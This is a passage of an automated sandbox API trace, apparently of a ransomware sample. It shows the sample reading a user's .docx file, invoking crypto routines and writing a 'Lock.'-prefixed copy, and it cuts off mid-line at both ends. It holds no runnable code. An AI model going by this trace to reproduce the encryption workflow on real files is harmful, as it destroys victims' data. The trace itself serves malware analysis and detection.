(HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0263.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.656] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0263.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0263.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0263.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.657] CryptDestroyHash (hHash=0xa87410) returned 1 [0263.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0263.657] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.658] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/hYiEt-0f.docx" (normalized: "c:\\users\\fd1hvy\\documents\\hyiet-0f.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0263.658] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0263.658] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0263.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0263.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0263.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0263.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0263.659] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0263.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0263.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0263.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0263.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0263.660] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.hYiEt-0f.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.hyiet-0f.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0263.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0263.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0263.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0263.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0263.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0263.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1253020 [0263.666] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0263.666] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0263.669] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x2b4b, lpOverlapped=0x0) returned 1 [0263.670] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0263.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0263.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b4b) returned 0x2f16018 [0263.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1253020 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b4b) returned 0x2f28b70 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b4b) returned 0x2f16018 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0263.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0263.678] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0263.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b4b) returned 0x2f16018 [0263.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55028 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55088 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55068 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0263.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b4b) returned 0x2f3b6c8 [0263.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0263.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0263.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0263.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0263.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0263.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 